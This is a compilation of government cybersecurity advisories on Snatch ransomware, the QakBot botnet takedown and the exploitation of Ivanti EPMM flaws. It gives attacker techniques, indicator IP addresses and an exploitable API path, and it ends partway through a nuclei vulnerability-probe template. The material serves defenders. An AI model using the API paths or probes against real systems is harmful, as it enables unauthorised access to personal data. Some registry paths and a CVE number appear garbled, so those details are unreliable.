Snatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.

Table 6: Snatch Threat Actors ATT&CK Techniques for Enterprise – Initial Access

Technique Title

ID

Use

Valid Accounts

T1078

Snatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network.

External Remote Services

T1133

Snatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network.

Snatch threat actors use VPN services to connect to a victim’s network.

Table 7: Snatch Threat Actors ATT&CK Techniques for Enterprise – Execution

Technique Title

ID

Use

Command and Scripting Interpreter: Windows Command Shell

T1059.003

Snatch threat actors may use batch files (.bat) during ransomware execution and data discovery.

System Services: Service Execution

T1569.002

Snatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used sc.exe.

Table 8: Snatch Threat Actors ATT&CK Techniques for Enterprise – Persistence

Technique Title

ID

Use

Valid Accounts: Domain Accounts

T1078.002

Snatch threat actors compromise domain accounts to maintain persistence on a victim’s network.

Table 9: Snatch Threat Actors ATT&CK Techniques for Enterprise – Defense Evasion

Technique Title

ID

Use

Masquerading

T1036

Snatch threat actors have the ransomware executable match the SHA-256 hash of a legitimate file to avoid rule-based detection.

Indicator Removal: File Deletion

T1070.004

Snatch threat actors delete batch files from a victim’s filesystem once execution is complete.

Modify Registry

T1112

Snatch threat actors modify Windows Registry keys to aid in persistence and execution.

Impair Defenses: Disable or Modify Tools

T1562.001

Snatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution.

Impair Defenses: Safe Mode Boot

T1562.009

Snatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running.

Table 10: Snatch Threat Actors ATT&CK Techniques for Enterprise – Credential Access

Technique Title

ID

Use

Brute Force: Password Guessing

T1110.001

Snatch threat actors use brute force to obtain administrator credentials for a victim’s network.

Table 11: Snatch Threat Actors ATT&CK Techniques for Enterprise – Discovery

Technique Title

ID

Use

Query Registry

T1012

Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Process Discovery

T1057

Snatch threat actors search for information about running processes on a system.

Table 12: Snatch Threat Actors ATT&CK Techniques for Enterprise – Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

Snatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol.

Table 13: Snatch Threat Actors ATT&CK Techniques for Enterprise – Collection

Technique Title

ID

Use

Data from Local System

T1005

Snatch threat actors search systems to find files and folders of interest prior to exfiltration.

Table 14: Snatch Threat Actors ATT&CK Techniques for Enterprise – Command and Control

Technique Title

ID

Use

Application Layer Protocols: Web Protocols

T1071.001

Snatch threat actors establish connections over port 443 to blend C2 traffic in with other web traffic.

Table 15: Snatch Threat Actors ATT&CK Techniques for Enterprise – Exfiltration

Technique Title

ID

Use

Exfiltration

TA0010

Snatch threat actors use exfiltration techniques to steal data from a victim’s network.

Table 16: Snatch Threat Actors ATT&CK Techniques for Enterprise – Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Snatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

Inhibit System Recovery

T1490

Snatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery.

MITIGATIONS

These mitigations apply to all stakeholders. The authoring agencies recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Reduce threat of malicious actors using remote access tools by:
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].
    • Using security software to detect instances of remote access software being loaded only in memory.
    • Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
  • Implement application controls to manage and control execution of software, including allowlisting remote access programs.
    • Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Disable command-line and scripting activities and permissions [CPG 2.N].
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C].
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
  • Reduce the threat of credential compromise via the following:
    • Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally.
    • Refrain from storing plaintext credentials in scripts.
  • Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E].

In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies.
    • Use longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints.”
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Disable unused ports and protocols [CPG 2.V].
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.
  • Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 4-16).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at [email protected] or (888) 282-0870.

REFERENCES

[1] DataBreaches.net

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.

VERSION HISTORY

September 20, 2023: Initial version.

August 29, 2023

Identification and Disruption of QakBot Infrastructure | CISA

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.

CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

AA23-242A STIX XML (XML, 51.62 KB )
AA23-242A STIX JSON (JSON, 43.12 KB )

TECHNICAL DETAILS

Overview

QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant amount of computer intrusions, to include ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.

Since its initial inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, to include performing reconnaissance, engaging in lateral movement, gathering and exfiltrating data, and delivering other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials are often sold to further the goals of the threat actor who delivered QakBot.

QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.

QakBot Infrastructure

QakBot’s modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike[1], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti[2], ProLock[3], Egregor[4], REvil[5], MegaCortex[6], Black Basta[7], Royal[8], and PwndLocker.

Historically, QakBot’s C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.

Figure 1: QakBot’s Tiered C2 Servers
Figure 1: QakBot’s Tiered C2 Servers

The first tier of C2 servers includes a subset of thousands of bots selected by QakBot administrators, which are promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes have been identified in 63 countries, which were active that same month. Supernodes have been observed frequently changing, which assists QakBot in evading detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes to relay communications to the Tier 2 C2 servers, serving as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.

Indicators of Compromise

FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with OakBot infections:

  1. QakBot sets up persistence via the Registry Run Key as needed. It will delete this key when running and set it back up before computer restart: HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
  2. QakBot will also write its binary back to disk to maintain persistence in the following folder: C:UsersAppDataRoamingMicrosoft
  3. QakBot will write an encrypted registry configuration detailing information about the bot to the following registry key: HKEY_CURRENT_USERSoftwareMicrosoft

In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.

Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these observed IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.

Table 1: IPs Affiliated with QakBot Infections

IP Address

First Seen

85.14.243[.]111

April 2020

51.38.62[.]181

April 2021

51.38.62[.]182

December 2021

185.4.67[.]6

April 2022

62.141.42[.]36

April 2022

87.117.247[.]41

May 2022

89.163.212[.]111

May 2022

193.29.187[.]57

May 2022

193.201.9[.]93

June 2022

94.198.50[.]147

August 2022

94.198.50[.]210

August 2022

188.127.243[.]130

September 2022

188.127.243[.]133

September 2022

94.198.51[.]202

October 2022

188.127.242[.]119

November 2022

188.127.242[.]178

November 2022

87.117.247[.]41

December 2022

190.2.143[.]38

December 2022

51.161.202[.]232

January 2023

51.195.49[.]228

January 2023

188.127.243[.]148

January 2023

23.236.181[.]102

Unknown

45.84.224[.]23

Unknown

46.151.30[.]109

Unknown

94.103.85[.]86

Unknown

94.198.53[.]17

Unknown

95.211.95[.]14

Unknown

95.211.172[.]6

Unknown

95.211.172[.]7

Unknown

95.211.172[.]86

Unknown

95.211.172[.]108

Unknown

95.211.172[.]109

Unknown

95.211.198[.]177

Unknown

95.211.250[.]97

Unknown

95.211.250[.]98

Unknown

95.211.250[.]117

Unknown

185.81.114[.]188

Unknown

188.127.243[.]145

Unknown

188.127.243[.]147

Unknown

188.127.243[.]193

Unknown

188.241.58[.]140

Unknown

193.29.187[.]41

Unknown

Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.

MITRE ATT&CK TECHNIQUES

For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK’s page on QakBot.[9]

MITIGATIONS

Note: For situational awareness, the following SHA-256 hash is associated with FBI’s QakBot uninstaller: 7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117

CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Best Practice Mitigation Recommendations

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud) [CPG 2.O, 2.R, 5.A].
  • Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards when developing and managing password policies [CPG 2.B]. This includes:
    • Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;
    • Store passwords in hashed format using industry-recognized password managers;
    • Add password user “salts” to shared login credentials;
    • Avoid reusing passwords;
    • Implement multiple failed login attempt account lockouts;
    • Disable password “hints”;
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA’s Implementing Phishing-Resistant MFA Factsheet.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities of internet-facing systems [CPG 1.E]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second-set of eyes on organizations’ internet-accessible assets. Organizations can email [email protected] with the subject line, “Requesting Cyber Hygiene Services” to get started.
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks to restrict adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated malware with a networking monitoring tool. To aid in detecting the malware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.D, 2.E].
  • Disable unused ports [CPG 2.V, 2.W, 2X].
  • Consider adding an email banner to emails received from outside your organization.
  • Disable hyperlinks in received emails.
  • Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task [CPG 2.E].
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
  • Perform regular secure system backups and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.

Ransomware Guidance

  • CISA.gov/stopransomware is a whole-of-government resource that serves as one central location for ransomware resources and alerts.
  • CISA, FBI, the National Security Agency (NSA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) published an updated version of the #StopRansomware Guide, as ransomware actors have accelerated their tactics and techniques since its initial release in 2020.
  • CISA has released a new module in its Cyber Security Evaluation Tool (CSET), the Ransomware Readiness Assessment (RRA). CSET is a desktop software tool that guides network defenders through a step-by-step process to evaluate cybersecurity practices on their networks.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see MITRE ATT&CK’s page on QakBot).[9]
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.

RESOURCES

REFERENCES

  1. MITRE: Cobalt Strike
  2. MITRE: Conti
  3. MITRE: ProLock
  4. MITRE: Egregor
  5. MITRE: REvil
  6. MITRE: MegaCortex
  7. MITRE: Black Basta
  8. MITRE: Royal
  9. MITRE: QakBot

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

VERSION HISTORY

August 30, 2023: Initial version.

August 1, 2023

Threat Actors Exploiting Ivanti EPMM Vulnerabilities | CISA

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.

Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.

CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.

Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.

This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt for compromise. CISA and NCSC-NO encourage organizations to hunt for malicious activity using the detection guidance in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA. If no compromise is detected, organizations should still immediately apply patches released by Ivanti.

Download the PDF version of this report:

AA23-213A PDF (PDF, 492.43 KB )

Download the .xml or .json file associated with this report:

AA23-213A STIX XML (XML, 277.43 KB )
AA23-213A STIX JSON (JSON, 250.01 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager (EPMM), formerly known as MobileIron Core, to target a Norwegian government network. Ivanti confirmed that the threat actors exploited CVE-2023-35078 and released a patch on July 23, 2023.[1] Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability, CVE-2023-35081, and released a patch for the second vulnerability on July 28, 2023.[2]

CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. The vulnerability allows unauthenticated access to specific application programming interface (API) paths. Threat actors with access to these API paths can access PII such as names, phone numbers, and other mobile device details of users on the vulnerable system; make configuration changes to vulnerable systems; push new packages to mobile endpoints; and access Global Positioning System (GPS) data if enabled.

According to Ivanti, CVE-2023-35078 can be chained with a second vulnerability CVE-2023-35081.[2] CVE-2023-35081 is directory traversal vulnerability [CWE-22] in EPMM. This vulnerability allows threat actors with EPMM administrator privileges the capability to write arbitrary files, such as webshells, with operating system privileges of the EPMM web application server. The actors can then execute the uploaded file.[2]

CISA added CVE-2023-35078 to its Known Exploited Vulnerabilities Catalog on July 25, 2023, and CVE-2023-35081 on July 31, 2023.

CISA and NCSC-NO are concerned about the potential for widespread exploitation of both vulnerabilities in government and private sector networks because MDM systems provide elevated access to thousands of mobile devices. Threat actors, including APT actors, have previously exploited a MobileIron vulnerability [3],[4].

APT Actor Activity

The APT actors have exploited CVE-2023-35078 since at least April 2023. The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy [T1090] to target infrastructure, and NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and:

  • Perform arbitrary Lightweight Directory Access Protocol (LDAP) queries against the Active Directory (AD).
  • Retrieve LDAP endpoints [T1018].
  • Use API path /mifs/aad/api/v2/authorized/users to list users and administrators [T1087.002] on the EPMM device.
  • Make EPMM configuration changes (Note: It is unknown what configuration changes the actors made).
  • Regularly check EPMM Core audit logs [T1005].

The APT actors deleted some of their entries in Apache httpd logs [T1070] using mi.war, a malicious Tomcat application that deletes log entries based on the string in keywords.txt. The actors deleted log entries with the string Firefox/107.0.

The APT actors used Linux and Windows user agents with Firefox/107.0 to communicate with EPMM. Other agents were used; however, these user agents did not appear in the device logs. It is unconfirmed how the threat actors ran shell commands on the EPMM device; however, NCSC-NO suspects the actors exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands [T1059].

The APT actors tunneled traffic [T1572] from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet [T1090.001]. It is unknown how they tunneled traffic. NCSC-NO observed that the network traffic used the TLS certificate of the internal Exchange server. The APT actors likely installed webshells [T1505.003] on the Exchange server in the following paths [T1036.005]:

  • /owa/auth/logon.aspx
  • /owa/auth/logoff.aspx
  • /owa/auth/OutlookCN.aspx

NCSC-NO also observed mi.war on Ivanti Sentry but do not know how the actors placed it there.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1—Table 7 for all referenced threat actor tactics and techniques in this advisory.

Table 1: APT Actors ATT&CK Techniques for Initial Access

Technique Title

ID

Use

Exploit Public-Facing Application

T1190

The APT actors exploited CVE-2023-35078 in public facing Ivanti EPMM appliances since at least April 2023.

Table 2: APT Actors ATT&CK Techniques for Execution

Technique Title

ID

Use

Command and Scripting Interpreter

T1059

The APT actors may have exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands.

Table 3: APT Actors ATT&CK Techniques for Discovery

Technique Title

ID

Use

Account Discovery: Domain Account

T1087.002

The APT actors exploited CVE-2023-35078 to gather EPMM device users and administrators.

Remote System Discovery

T1018

The APT actors retrieved LDAP endpoints.

Table 4: APT Actors ATT&CK Techniques for Persistence

Technique Title

ID

Use

Masquerading: Match Legitimate Name or Location

T1036.005

The APT actors likely installed webshells at legitimate Exchange server paths.

Server Software Component: Web Shell

T1505.003

The APT actors implanted webshells on the compromised infrastructure.

Table 5: APT Actor ATT&CK Techniques for Defense Evasion

Technique Title

ID

Use

Indicator Removal

T1070

APT actors deleted httpd access logs after the malicious activities took place using string Firefox/107.0.

Table 6: APT Actor ATT&CK Techniques for Collection

Technique Title

ID

Use

Data from Local System

T1005

APT actors regularly checked EPMM Core audit logs.

Table 7: APT Actor ATT&CK Techniques for Command and Control

Technique Title

ID

Use

Protocol Tunneling

T1572

The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.

Proxy

T1090

The actors leveraged compromised SOHO routers to proxy to and compromise infrastructure.

The actors tunneled traffic from the internet to at least one Exchange server.

Proxy: Internal Proxy

T1090.001

The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.

EVIDENCE OF VULNERABILITY METHODS

CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-30578:

id: CVE-2023-35078-Exposure

 

info:

  name: Ivanti EPMM Remote Unauthenticated API Access

  author: JC

  severity: critical

  reference:

    - https://nvd.nist.gov/vuln/detail/CVE-2023-35078

  description: Identifies vulnerable instances of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass.

  tags: ivanti, mobileiron, epmm, auth-bypass

 

requests:

  - method: GET

    path:

      - "{{RootURL}}/mifs/aad/api/v2/ping"

 

    matchers-condition: and

    matchers:

                   

      - type: status

        status:

          - 200

       

      - type: word

        part: body

        words:

          - "vspVersion"

          - "apiVersion"

        condition: and

CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081:

id: CVE-2023-35081

 

info:

  name: Ivanti EPMM Remote Arbitrary File Write

  author: JC

  severity: High

  reference:

